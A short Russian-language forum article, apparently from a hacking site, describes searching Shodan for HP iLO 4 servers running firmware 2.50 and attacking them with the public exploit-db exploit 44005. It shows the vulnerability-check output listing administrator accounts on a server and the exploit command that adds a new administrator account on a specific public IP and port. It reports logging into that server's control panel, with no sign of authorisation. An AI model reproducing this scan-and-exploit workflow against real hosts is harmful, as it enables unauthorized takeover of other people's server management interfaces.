Статья Shodan: HP iLO RCE

[netcat]

[Shodan: HP iLO RCE]


Вспомнилась старая уязвимость 2018 года, связанная с системой управления серверами HP.

В Сети в открытом доступе опубликован эксплоит для серьезной уязвимости в серверах Hewlett Packard Integrated Lights-Out 4 (HP iLO 4)
подробнее тут | и здесь

Был взят эксплойт с ресурса https://www.exploit-db.com/exploits/44005 HPE iLO 4 < 2.53 – Add New Administrator User
Сделав запрос в шодане получаем сервера с iLO v2.5

iLO-Firmware: 2.50

iLO-Firmware: 2.50

При проверке с ключом -t . видим список администраторов

[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator
[+] Account name: User Account Username: Black

запускаем эксплойт с ключами -e -u shodan -p shodan@1234Shodan 173.13.58.217:8889

авторизация

панель управления



так же хочется добавить аналог шодана FOFA